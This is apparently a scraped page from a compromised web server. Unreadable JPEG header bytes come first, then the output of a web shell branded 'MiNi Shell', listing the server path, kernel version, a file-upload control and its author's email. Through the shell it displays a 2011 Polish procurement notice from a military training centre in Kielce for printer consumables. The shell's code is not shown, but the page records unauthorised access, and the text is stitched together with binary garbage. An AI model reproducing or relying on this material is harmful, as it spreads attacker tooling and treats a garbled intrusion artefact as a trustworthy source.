JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110609/150266-N-2011.html

<p class="kh_header"><b>Kielce: Zakup materiałów eksploatacyjnych do drukarek, 
                                                          kserokopiarek i faksów</b><br>
<b>Numer ogłoszenia: 150266 - 2011; data zamieszczenia: 09.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Szkolenia na Potrzeby Sił Pokojowych , ul. Wojska Polskiego 300, 25-205 Kielce, woj. brak, tel. 041 3174300, 2786340, faks 041 3174330, 2786330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.csnpsp.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup materiałów eksploatacyjnych do drukarek, 
                                                          kserokopiarek i faksów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania części lub całości zamówienia podwykonawcom. W takim przypadku Wykonawca zobowiązany jest do wskazania w swojej ofercie części zamówienia (zakresu), których wykonanie zamierza powierzyć podwykonawcom.

1) Przedmiotem zamówienia jest:  zakup materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów. Zamówienie obejmuje dostawę materiałów eksploatacyjnych tj.: tuszów, tonerów, taśm barwiących, bębnów fabrycznie nowych, nie regenerowanych, wymaganych zgodnie z instrukcjami użytkowania i warunkami gwarancji dla poszczególnych typów drukarek, kserokopiarek i faksów, będących w posiadaniu Zamawiającego. Przez wymagane tusze , tonery,  taśmy barwiące i bębny,  należy rozumieć tusze, tonery, taśmy barwiące i bębny dla danej drukarki, kserokopiarki, faksu wyprodukowane przez producenta danej drukarki, kserokopiarki  i faksu lub przez niego zalecane. 
Zamawiający zainteresowany jest zakupem materiałów eksploatacyjnych o najwyższej jakości, zapewniających bezawaryjną pracę sprzętu.
Materiały eksploatacyjne -oryginalne lub równoważne (taśmy, tonery, tusze, bębny) muszą być  wyprodukowane z nowych elementów, bez śladów uszkodzenia i użytkowania, nie regenerowanych, nie prefabrykowanych, posiadające wszelkie zabezpieczenia szczelności zbiorników, muszą pochodzić z bieżącej produkcji (2011rok) i w chwili dostawy muszą posiadać   minimum 12 miesięcy gwarancji, muszą być opakowane w oryginalne, nienaruszone opakowania, w tym wewnętrzne opakowanie hermetyczne i zewnętrzne opakowanie tekturowe z widocznym   logo i nazwą producenta, symbolem produktu i  terminem przydatności do użytku. 
Wykonawca musi zaoferować przedmiot zamówienia zgodny z wymogami zamawiającego,
określonymi w SIWZ . Wskazane tam ewentualne znaki  towarowe są uzasadnione specyfiką 
przedmiotu zamówienia i mają na celu wskazanie jego  jakości i wydajności. W związku z 
powyższym wykonawcy mogą składać oferty równoważne, za które uważane będą oferty 
zawierające materiały eksploatacyjne  kompatybilne ze wskazanym sprzętem, o parametrach 
takich samych lub lepszych (pojemność tuszu/tonera, wydajność i jakość wydruku) w 
stosunku do oryginału produkowanego przez producenta urządzenia.
Obowiązek wykazania, iż oferowany przedmiot zamówienia spełnia wymagania zamawiającego, leży po stronie wykonawcy. 
Oferowane równoważne materiały nie mogą powodować ograniczeń funkcji i możliwości sprzętu oraz zaniżać jakości wydruku oferowanych w warunkach technicznych producenta sprzętu (pełna kompatybilność  z oprogramowaniem sprzętu: informowanie o liczbie wydrukowanych stron, poziomie zużycia tonera, tuszu, głowicy- jeśli sprzęt posiada możliwości). 
W przypadku zaoferowania materiałów eksploatacyjnych równoważnych, wyprodukowanych przez producentów nie będących producentami poszczególnych urządzeń, wykonawca zobowiązany jest do dołączenia do oferty dokumentacji, wskazanej w części  VI pkt8 niniejszej specyfikacji, potwierdzającej, że materiały te są fabrycznie nowe, oraz że spełniają wymogi co do wymaganej jakości oraz wydajności.  Wydajność produktów równoważnych dla urządzeń musi zostać odpowiednio stwierdzona testami przeprowadzonymi wg standardów  norm  ISO, tj.:
  - normy wydajności ISO/IEC 19752:2004 ( w odniesieniu do wkładów monochromatycznych), 
  - normy wydajności ISO/IEC 19798:2007 ( w odniesieniu do wkładów kolorowych), 
  - normy wydajności ISO/IEC 24711 ( w odniesieniu do nabojów czarnych do drukarek  
                                                                           atramentowych),                                                                            
  - normy wydajności ISO/IEC 24712 ( w odniesieniu do nabojów kolorowych do drukarek 
                                                                         atramentowych).


Wykonawca realizuje przedmiot zamówienia tak jak podano w tabeli w specyfikacji istotnych warunków zamówienia 
                                                                
         
2)  Wymagania stawiane Wykonawcy:

a)	Wykonawca przedstawi Zamawiającemu raport z przeprowadzonego testu wydajnościowego do każdego z osobna materiału eksploatacyjnego - równoważnego, wg. norm:
   - normy wydajności ISO/IEC 19752:2004 ( w odniesieniu do wkładów monochromatycznych), 
    - normy wydajności ISO/IEC 19798:2007 ( w odniesieniu do wkładów kolorowych), 
    - normy wydajności ISO/IEC 24711 ( w odniesieniu do nabojów czarnych do drukarek   
                                                  atramentowych)
    - normy wydajno ISO/IEC 24712  ( w odniesieniu do nabojów kolorowych do drukarek   
                                              atramentowych),
  Należy przedstawić raport z przeprowadzonego testu wydajności do każdego materiału 
  eksploatacyjnego równoważnego. Zamawiający za właściwe testy, uzna te, które będą 
  wykonywane przez niezależny ośrodek. Nie dopuszcza się testów wykonanych przez          
   producenta materiału eksploatacyjnego, który jest uczestnikiem postępowania.
b)	Zamawiający wymaga, aby oferowane materiały eksploatacyjne (taśmy, tonery, tusze, bębny) były zgodne z instrukcjami użytkowania i warunkami gwarancji określonymi przez producentów sprzętu będącego w posiadaniu zamawiającego.
c)	Wykonawca gwarantuje, że dostarczone tonery i wkłady drukujące  będą wysokiej jakości oraz zapewniają kompatybilność pracy z urządzeniami Zamawiającego, zapewniają należyte bezpieczeństwo  oraz posiadają właściwe opakowanie i oznakowanie.
d)	Wykonawca gwarantuje, że zamontowanie i użytkowanie  dostarczonych przez niego tonerów i wkładów drukujących nie spowoduje utraty praw gwarancji producenta danego urządzenia  do którego są dostarczone.
e)	Jeżeli w trakcie użytkowania Zamawiający stwierdzi, że wydajność lub niezawodność dostarczonych produktów niekorzystnie odbiega od wymagań producenta sprzętu, Wykonawca zobowiązuje się do gwarancyjnej wymiany produktu na nowy, wolny od wad w terminie 5 dni (w dni robocze) od momentu zgłoszenia przez Zamawiającego wady produktu (faksem  lub telefonicznie). Wymiana nastąpi w siedzibie Zamawiającego, na koszt i ryzyko Wykonawcy w razie stwierdzenia wad produktu.
f)	Wykonawca gwarantuje udzielenia 12-miesięcznej gwarancji na dostarczone materiały eksploatacyjne producenta sprzętu oraz gwarancji do wyczerpania środka barwiącego.
g)	Wykonawca zobowiązany jest do pokrycia kosztów naprawy drukarki lub innego urządzenia, gdy uszkodzenie powstało w wyniku stosowania materiałów równoważnych dostarczonych przez Wykonawcę. Za podstawę żądania Zamawiającego naprawy drukarki (włączając w to wymianę bębna lub głowicy) uważa się pisemną opinię autoryzowanego serwisu producenta drukarki. Naprawa drukarki wykonana zostanie w autoryzowanym serwisie producenta drukarki w ciągu 5 dni (w dni robocze) od momentu zgłoszenia (faksem lub telefonicznie) Wykonawcy przez Zamawiającego konieczności dokonania naprawy. Koszty związane z naprawą ponosi Wykonawca.
h)	W przypadku wystąpienia uszkodzeń dostarczonego przedmiotu zamówienia, powstałych na
      skutek wad materiałowych, wykonania lub innych wad ukrytych wykonawca zobowiązany
      będzie na własny koszt do jego wymiany na nowy, wolny od wad. Wymagany przez
      zamawiającego czas na wymianę przedmiotu zamówienia wynosi 5 dni robocze licząc od
      dnia zgłoszenia telefonicznego lub faksem przez zamawiającego.
i)	Zamawiający dopuszcza powierzenie wykonania zamówienia podwykonawcom. W takim
      przypadku zamawiający żąda wskazania przez wykonawcę w swojej ofercie części (zakres)
      zamówienia, którą zamierza powierzyć podwykonawcom. Nie dopełnienie w/w obowiązku
      oznaczać będzie, iż wykonawca wykona przedmiot zamówienia samodzielnie.
j)	Zlecenie części przedmiotu zamówienia podwykonawcom nie zmienia zobowiązań wykonawcy wobec Zamawiającego. Wykonawca będzie odpowiedzialny za działania, uchybienia i zaniedbania podwykonawców i ich pracowników w takim samym stopniu jakby to były działania, uchybienia i zaniedbania jego własnych pracowników. W przypadku, gdy wykonawca zostanie wybrany do realizacji zamówienia, podstawą odbioru przedmiotu zamówienia od wykonawcy będzie protokół odbioru i dokonanie rozliczenia dostaw  z podwykonawcami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.10-5, 30.12.51.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie tego warunku należy złożyć oświadczenie .
1.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI  specyfikacji istotnych warunków zamówienia, według reguły spełnia - nie spełnia.
2.	Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi w  specyfikacji  oraz  została  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie tego warunku należy złożyć oświadczenie .
1.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI  specyfikacji istotnych warunków zamówienia, według reguły spełnia - nie spełnia.
2.	Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi w  specyfikacji  oraz  została  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie tego warunku należy złożyć oświadczenie .
1.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI  specyfikacji istotnych warunków zamówienia, według reguły spełnia - nie spełnia.
2.	Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi w  specyfikacji  oraz  została  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie tego warunku należy złożyć oświadczenie .
1.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI  specyfikacji istotnych warunków zamówienia, według reguły spełnia - nie spełnia.
2.	Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi w  specyfikacji  oraz  została  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie tego warunku należy złożyć oświadczenie .
1.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI  specyfikacji istotnych warunków zamówienia, według reguły spełnia - nie spełnia.
2.	Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi w  specyfikacji  oraz  została  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Raport z przeprowadzonego testu wydajnościowego do każdego z osobna materiału eksploatacyjnego - równoważnego, wg. norm:
ISO 19752:2004 (w odniesieniu do wkładów monochromatycznych)
ISO 19798:2007 (w odniesieniu do wkładów kolorowych)
ISO 24711 (w odniesieniu do nabojów czarnych do drukarek atramentowych)                
ISO 24712   (w odniesieniu do nabojów kolorowych do drukarek atramentowych) .
              Zamawiający za właściwe testy, uzna te, które będą wykonywane przez 
              niezależny ośrodek. Nie dopuszcza się testów wykonanych przez producenta 
              materiału eksploatacyjnego który jest uczestnikiem postępowania.

Wypełniony i podpisany  Formularz ofertowy  z wykorzystaniem wzoru - załącznik  nr 1.
Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art.22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113 poz.759), z wykorzystaniem wzoru - załącznik nr 2.
Parafowany przez Wykonawcę wzór umowy - załącznik nr 4</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku , kiedy Wykonawcę-osobę upoważnioną prawnie do podpisywania oferty, reprezentuje pełnomocnik ,Wykonawca zobowiązany jest złożyć Pełnomocnictwo upoważniające do podpisywania oferty i wykonywania czynności w postępowaniu w imieniu Wykonawcy. Jeżeli pełnomocnik w imieniu Wykonawcy podpisuje także oświadczenie wiedzy o spełnieniu przez Wykonawcę warunków udziału w postępowaniu oraz oświadczenie  o braku podstaw do wykluczenia Wykonawcy z postępowania, udzielone pełnomocnictwo ma zawierać upoważnienie do złożenia takiego oświadczenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.csnpsp.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Szkolenia Na Potrzeby Sił Pokojowych w Kielcach ul.Wojska Polskiego 300,25-205 Kielce, budynek Komendy Ip,pok.107..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2011 godzina 11:45, miejsce: Oferty na należy składać w siedzibie Zamawiającego, Kielce ul. Wojska Polskiego 300 w Kancelarii Jawnej /czynna od poniedziałku do piątku w godz.: od 7:30 do 15:30 /.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com